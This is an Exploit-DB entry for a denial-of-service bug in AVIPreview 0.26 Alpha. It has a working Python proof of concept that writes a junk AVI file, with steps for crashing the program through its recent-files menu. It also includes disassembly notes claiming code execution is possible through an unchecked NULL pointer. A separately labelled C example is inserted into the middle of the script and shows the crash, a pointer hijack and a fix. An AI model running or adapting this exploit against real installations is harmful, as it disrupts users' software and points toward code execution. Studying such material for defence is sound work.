
AVIPreview 0.26 Alpha - Denial of Service

Author: BraniX
type: dos
platform: windows
port: 
date_added: 2011-03-16 
date_updated: 2011-03-16 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt17000/screen-shot-2011-03-16-at-64001-am.png 
application_url: http://www.exploit-db.comavipreview_by_aj_026_alpha.zip

# done by BraniX <branix@hackers.org.pl>
# www.hackers.org.pl
# found: 2011.03.15
# published: 2011.03.15
# tested on: Windows XP SP3 Home Edition

# App:              AVIPreview 0.26 Alpha
# App Url:          http://www.divx-digest.com/software/avipreview_aj.html
# AVIPreview.exe    MD5: 399ab43edd26c655d0876dc5ddcaa3a7

# DoS is caused by an Access Violation exception: the app loads a global pointer from its
# .data section that is still 0 (NULL), reads through it, and would then dispatch an
# indirect call through what it read

# 00405B59  8B0D E0B14100   MOV ECX,DWORD PTR DS:[41B1E0]       <-- Read from .data section DD 0h
# 00405B5F  8B11            MOV EDX,DWORD PTR DS:[ECX]          <-- Exception, but if EDX is a pointer to SH
# 00405B61  A1 E0B14100     MOV EAX,DWORD PTR DS:[41B1E0]
# 00405B66  50              PUSH EAX
# 00405B67  FF52 30         CALL DWORD PTR DS:[EDX+30]          <-- We will have LCE

# If an attacker can force something meaningful into the dword at 41B1E0 (.data is RW),
# ECX becomes a pointer to a controlled structure, EDX its first dword, and
# CALL DWORD PTR DS:[EDX+30] transfers to an attacker-chosen address,
# so he/she will have code execution
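The crash pattern in the listing above, as an added example in C (this is not part of BraniX's exploit nor AVIPreview's code): a global object pointer in zero-initialised .data, the unchecked vtable-style dispatch through it that mirrors the four instructions one for one, the same handler with the NULL check that would turn the access violation into an error return, and the hijack case the note describes, where a controlled value in the .data slot makes the indirect call land in attacker code. Struct, field and function names are hypothetical; only the slot offset 0x30 comes from the disassembly.

```c
#include <stddef.h>
#include <stdio.h>

/* Slot index whose byte offset is 0x30 with 4-byte pointers, matching
 * CALL DWORD PTR DS:[EDX+30] on the 32-bit target. Built 64-bit, the same
 * slot sits at 0x60; the dispatch logic is identical. */
#define CALL_SLOT 12

struct vtable {
    void (*slots[CALL_SLOT + 1])(void *self);
};

/* Hypothetical player object: its first field is the vtable pointer, which is
 * exactly what MOV EDX,DWORD PTR DS:[ECX] loads. */
struct player {
    const struct vtable *vt;
    int frames_shown;
};

/* Stand-in for the dword at 41B1E0. Static storage is zero-initialised, the
 * "DD 0h" from the listing: NULL until an AVI has actually been opened. */
static struct player *g_player = NULL;

/* Vulnerable handler, one statement per instruction in the listing.
 * Calling it while g_player is NULL raises the access violation. */
static void recent_file_vuln(void)
{
    struct player *p = g_player;          /* MOV ECX,DWORD PTR DS:[41B1E0] */
    const struct vtable *vt = p->vt;      /* MOV EDX,DWORD PTR DS:[ECX]  <- AV when p == 0 */
    vt->slots[CALL_SLOT](p);              /* PUSH EAX ; CALL DWORD PTR DS:[EDX+30] */
}

/* Hardened handler: refuse to dispatch when no player object exists yet. */
static int recent_file_fixed(void)
{
    struct player *p = g_player;
    if (p == NULL || p->vt == NULL)
        return -1;                        /* nothing opened; do not dereference */
    p->vt->slots[CALL_SLOT](p);
    return 0;
}

/* Legitimate slot implementation. */
static void play_slot(void *self)
{
    ((struct player *)self)->frames_shown++;
}

/* Attacker-supplied slot: counts how often the hijacked call reaches it. */
static int g_payload_hits = 0;
static void attacker_slot(void *self)
{
    (void)self;
    g_payload_hits++;
}

/* Normal path: a real object behind the global, dispatch works, fix does not break it. */
int demo_legit(void)
{
    static const struct vtable real_vt = { .slots = { [CALL_SLOT] = play_slot } };
    static struct player real_obj;
    real_obj.vt = &real_vt;
    real_obj.frames_shown = 0;
    g_player = &real_obj;
    int rc = recent_file_fixed();
    g_player = NULL;
    return rc == 0 ? real_obj.frames_shown : -1;   /* 1 on success */
}

/* The "something meaningful in .data" case: the global now points at a fake
 * object whose slot 0x30 is attacker code, and the vulnerable handler
 * dispatches to it without complaint. */
int demo_hijack(void)
{
    static const struct vtable fake_vt = { .slots = { [CALL_SLOT] = attacker_slot } };
    static struct player fake_obj;
    fake_obj.vt = &fake_vt;
    g_payload_hits = 0;
    g_player = &fake_obj;
    recent_file_vuln();
    g_player = NULL;
    return g_payload_hits;                /* 1: the indirect call reached attacker code */
}

/* The NULL case: the fixed handler returns an error instead of crashing. */
int demo_null_fixed(void)
{
    g_player = NULL;
    return recent_file_fixed();           /* -1 */
}

int main(void)
{
    printf("legit dispatch, frames shown: %d\n", demo_legit());
    printf("hijacked dispatch, payload hits: %d\n", demo_hijack());
    printf("NULL global, fixed handler rc: %d\n", demo_null_fixed());
    /* recent_file_vuln() with g_player == NULL is the crash itself; deliberately not called. */
    return 0;
}
```

The unchecked handler and the hardened one differ only in the NULL test; everything after the check is the same dispatch, which is why the fix is a one-line guard at the call site (or, better, never leaving the recent-file menu entry enabled while the global is unset). Build with `-m32` where available to see slot 0x30 at its original offset.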

path = "C:\\DoS.avi"

# 500000 bytes of 'A' (0x41) is not a valid RIFF/AVI file: AVIPreview rejects it
# with an error box, but the file still lands in its recent-files list, and
# re-opening it from there hits the NULL-pointer read described above.
with open(path, "wb") as f:
    f.write(b"\x41" * 500000)

print("File generated: " + path)
print("In order to DoS AVIPreview 0.26 Alpha execute the following steps\n")

print("1. Open file '" + path + "' in AVIPreview; the application will show a MessageBox with an error, but will not crash")
print("2. Select 'No', otherwise AVIPreview will pop up a browser")
print("3. Navigate to the File menu and pick the recent file (which points to our AVI file)")
print("4. You have DoS :>")